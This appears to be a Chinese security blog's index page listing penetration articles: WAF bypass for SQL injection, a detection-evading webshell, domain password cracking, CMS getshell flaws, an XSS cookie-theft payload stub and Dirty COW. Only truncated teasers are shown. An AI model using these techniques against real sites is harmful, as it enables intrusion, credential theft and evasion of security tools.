网络渗透漏洞

Bypass 护卫神SQL注入防御(多姿势)

0x00 前言 护卫神一直专注服务器安全领域, 其中有一款产品,护卫神·入侵防护系统 ,提供了一些网站安全防护的功能,在IIS加固模块中有一个SQL防注入功能。 这边主要分享一下几种思路,Bypass 护卫神SQL注入防御。...继续阅读 »
网络渗透漏洞

攻破黑市之拿下吃鸡DNF等游戏钓鱼站群

前段时间有个网友给我发了个网址,说找到个专门做钓鱼网站的连接,让我看看,然后就引出了一系列事件。 网址如下:http://mfnyongshihuigui.jiebao8.top 当时也没在意,有天闲着无...继续阅读 »
网络渗透漏洞

又来一发,从黑产大牛手里来的马

mmp又是免杀。可绕过安全狗、360WAF、百度云、阿里云Waf、牛盾、云盾、以及冷门Waf、市面所有后门检测工具大哥些自己取啊   这个马儿有点特殊  用 source.php 文件去调用png 然后png里面是 马儿的地址...继续阅读 »
网络渗透漏洞

离线破win2003域账号密码(更新域数据库不在默认路径的情况)

一 实验环境:windows server2003,域环境 搭建方法很简单,百度搜搜。     新建一个域用户xiaocai,密码设为 123abcABC ...继续阅读 »
网络渗透漏洞

一个带黑页的一句话php代码

? 1 2 3 4 ...继续阅读 »
网络渗透漏洞

Metinfo5.3.10版本Getshell

好久没代码审计了,今早上cheery师傅跟我说了一下这个洞,尽管这个洞已经被修复了,但是还是比较新的,看了下没那么难,就简单写下步骤: 0x01 首先看一下配置的文件include/common.inc.php ...继续阅读 »
网络渗透漏洞

WEB代码审校ASP0day挖掘及代码防御

教程介绍 面对脚本“伪黑客”对网站的种种攻击威胁,代码审校工程师的作用尤为重要 通过深入发掘WEB程序漏洞(0day)并通过合理可靠的代码防御来阻止攻击,确保网站程序安全。 学习者需提前掌握ASP网络编程语言,数据库指令...继续阅读 »
网络渗透漏洞

灰盒测试之织梦dedecms 5.7 官网最新版 Getshell

很久之前一直用dedecms做二次开发、直接做模版就好了,偶尔要写原生的php代码与dede交互,简单的了解了下里面的model,并未深入,dedecms漏洞那么多、、、能不能也找出一个漏洞呢。 下载了官网最新的程序研究了下。 在前台有个提交友...继续阅读 »
网络渗透漏洞

Dedecms通用XSS+CSRF#前台获取管理员cookie

Dedecms的后台搜索的地方存在反射xss,但是我们可以构造src地址,让他加载代码。 这里我利用xss平台来外部加载一串js代码来获取cookie并发送到xss平台 payload: <script src=h...继续阅读 »
网络渗透漏洞

PHPCMS V9 版本后台设计缺陷导致任意代码执行漏洞

0x01 背景 由于默认安装后需要超级管理员权限,故该漏洞很鸡肋,但感觉应该会在其它cms中也存在,所以主要分享下挖掘思路~ PS:使用的测试环境是php5.6(已经移除gpc选项) ...继续阅读 »
网络渗透漏洞

深入解读脏牛Linux本地提权漏洞(CVE-2016-5195)

摘要:0x00 概述 该漏洞是Linux的一个本地提权漏洞,发现者是Phil Oester,影响=2.6.22的所有Linux内核版本,修复时间是2016年10月18号。该漏洞的原因是get_user_page内核函数在处理Copy-on-Write(以下...继续阅读 »